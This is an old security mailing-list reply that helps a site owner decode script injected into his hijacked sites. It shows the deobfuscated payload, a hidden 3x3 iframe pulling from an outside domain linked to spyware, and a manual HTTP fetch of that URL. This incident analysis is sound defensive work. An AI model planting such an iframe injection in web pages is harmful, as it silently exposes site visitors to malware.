[Dshield] need help decoding.

Darren Spruell phatbuckett at gmail.com
Wed Sep 19 03:13:31 GMT 2007


On 9/18/07, Dan Jackson <kybowhunter515 at yahoo.com> wrote:
> Recently several of my sites got hijacked and below is the code that
> was inserted, what I'm trying to do is to decode it to figure out what
> its intent was and to see if it opened up any other holes in the
> server that I need to know about.
>
>
>
> Maybe this is easy stuff... but I don't have a clue where to start ...

I deobfuscate most things with Spidermonkey, a JS engine that can be
run from the command line. Running yours through comes back with this:

</textatea></textarea><IFRAME
src="http://marcobernardoni.com/x/index.php" width=3 height=3
style="display:none"></IFRAME>

...which looks to be an iframe injection pulling from the URL you see.

Retrieving that file (/x/index.php) from the site comes back with a
single '0', which I'm not sure means what exactly.

Connected to marcobernardoni.com.
Escape character is '^]'.
GET /x/index.php HTTP/1.1
Host: marcobernardoni.com

HTTP/1.1 200 OK
Date: Tue, 18 Sep 2007 13:44:38 GMT
Server: Apache/1.3.37 (Unix) mod_ssl/2.8.28 OpenSSL/0.9.7a PHP/4.4.7
mod_perl/1.29 FrontPage/5.0.2.2510
X-Powered-By: PHP/4.4.7
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html
X-Pad: avoid browser bug

0

Connection closed by foreign host.


It's interesting to note that http://marcobernardoni.com/ is the "this
site isn't here yet" message from the hoster, but the site does have
content on it (the PHP referenced in the iframe.) The site is also
referenced several times in the context of spyware hosting:

http://www.google.com/search?hl=en&hs=II&q=marcobernardoni.com+iframe&btnG=Search

Others can fill in the gaps... ;)

DS

